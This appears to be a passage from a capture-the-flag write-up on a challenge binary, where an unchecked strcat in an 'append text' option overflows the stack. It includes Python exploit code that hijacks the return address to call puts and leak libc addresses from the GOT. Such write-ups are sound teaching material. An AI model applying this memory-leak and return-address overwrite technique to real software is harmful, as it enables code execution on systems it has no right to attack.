So, I add a text, the max length is 0x30, but if edit the text, there are two options:

Shell

1

2

3

Enter ur option:2

[1]Append text

[2]Overwrite

When I choose the first option, we can see the vulnerability.

Shell

1

2

src=(char*)read_stdin(50);

strcat(&dest,src);

We can write indiscriminately into dest without any length check, and that would cause a buffer overflow into stack. Then, if we create a 0x4A bytes text long, we can overwrite the return address.

The exploit

We could write a full exploit, only if we get a memory leak, and leak the libc virtual address. For that purpose we could print the .got section value and get the libc function virtual address import for the binary.

Python

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

print"[*] Triggering memory leaks..."

jmp_puts=0x08048420

got=0x0804A00C

pc=p32(jmp_puts)

ret=p32(0x0804862F)

arg0=p32(got)

overflow=pc+ret+arg0

add_text('A'*0x30)

edit_text(1,'B'*(0x18+2)+overflow)

_exit()

r=s.recv(1024)

print"[*] Gotting libc virtual addresses..."

VAs=map(''.join,zip(*[iter(r)]*4))

printf=u32(VAs[0])

fgets=u32(VAs[1])

strcat=u32(VAs[2])

puts=u32(VAs[3])

strchr=u32(VAs[4])

libc_start_main=u32(VAs[5])

setvbuf=u32(VAs[6])

atoi=u32(VAs[7])

print"[*] printf @ 0x%x"%printf

print"[*] fgets @ 0x%x"%fgets

print"[*] strcat @ 0x%x"%strcat

print"[*] puts @ 0x%x"%puts

print"[*] strchr @ 0x%x"%strchr

print"[*] __libc_start_main @ 0x%x"%libc_start_main

print"[*] atoi @ 0x%x"%atoi

In this challenge we got the libc. So, we could get the libc base and another functions.